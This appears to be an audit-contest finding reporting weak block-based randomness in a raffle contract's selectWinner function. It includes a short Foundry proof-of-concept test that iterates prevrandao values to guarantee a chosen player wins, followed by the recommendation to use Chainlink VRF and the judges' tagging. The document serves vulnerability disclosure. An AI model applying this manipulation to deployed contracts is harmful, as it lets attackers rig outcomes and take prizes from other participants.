Submission Details
Severity:
selectWinner function has weak source of randomness
Summary
Function selectWinner uses weak block based Pseudo-Random Number Generators to select a winner and token rarity. This allows a malicious user to wait for the right conditions to become a winner.
Vulnerability Details
Weak block based PRNG
Impact
Users can use this to easily win.
POC using foundry forge test
function testGauranteeWin() public playersEntered {
vm.warp(block.timestamp + duration + 1);
vm.roll(block.number + 1);
uint256 playersLength = 4;
uint256 playerOneIndex = puppyRaffle.getActivePlayerIndex(playerOne);
for (uint256 i = 0; i < 100; i++) {
vm.prevrandao(bytes32(i));
uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(playerOne, block.timestamp, block.difficulty))) % playersLength;
if (playerOneIndex == winnerIndex) {
vm.prank(playerOne);
puppyRaffle.selectWinner();
assertEq(puppyRaffle.previousWinner(), playerOne);
break;
}
}
}
Tools Used
Foundry
Slither
Recommendations
Do not use block values such as block.timestamp and block.difficulty as sources of randomness.
Use Chainlin VRF to generate random numbers.
Updates
Lead Judging Commences
Hamiltonite over 1 year ago
Submission Judgement Published Assigned finding tags:
weak-randomness
Root cause: bad RNG Impact: manipulate winner
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.